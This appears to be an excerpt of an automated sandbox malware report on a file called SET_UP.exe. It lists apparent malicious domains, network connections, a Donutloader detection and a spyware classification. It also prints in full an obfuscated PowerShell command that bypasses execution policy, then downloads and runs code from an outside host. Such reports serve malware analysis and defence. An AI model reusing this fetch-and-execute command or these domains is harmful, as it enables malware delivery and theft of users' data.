Source: SET_UP.exe; String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: SET_UP.exeString found in binary or memory: http://www.innosetup.com/
              Source: SET_UP.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: SET_UP.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: SET_UP.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033447895.0000000000956000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000956000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2036975515.0000000003678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: SET_UP.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: SET_UP.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.onlin
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
              Source: SET_UP.exeString found in binary or memory: https://dfgh.online/
              Source: powershell.exe, 00000004.00000002.2055826349.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
              Source: powershell.exe, 00000004.00000002.2056281293.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/;
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/Fi
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/_B
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035351543.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txter
              Source: SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1
              Source: SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtxe
              Source: SET_UP.exe, 00000000.00000003.2032852919.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977857592.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977322995.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1978395050.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976505025.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976948513.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976169185.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946456682.0000000003676000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/
              Source: SET_UP.exe, 00000000.00000003.1957745990.0000000003687000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958214464.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2003997079.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032739834.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033008758.000000000368B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/88q
              Source: SET_UP.exe, 00000000.00000003.1946540619.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/A
              Source: SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/K
              Source: SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/RN
              Source: SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/Y
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.000000000094F000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/api
              Source: SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/c
              Source: SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/s
              Source: SET_UP.exe, 00000000.00000003.2004113254.000000000094F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou:443/api
              Source: SET_UP.exe, 00000000.00000003.1922330613.0000000003714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: SET_UP.exeStatic PE information: invalid certificate
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: SET_UP.exe, 00000000.00000000.1729232614.000000000051F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exe, 00000000.00000003.1897592734.0000000003067000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@5/2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgb1yaxp.xwn.ps1Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SET_UP.exe, 00000000.00000003.1946456682.0000000003689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SET_UP.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: SET_UP.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: SET_UP.exeString found in binary or memory: /LoadInf=
              Source: SET_UP.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SET_UP.exe "C:\Users\user\Desktop\SET_UP.exe"
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
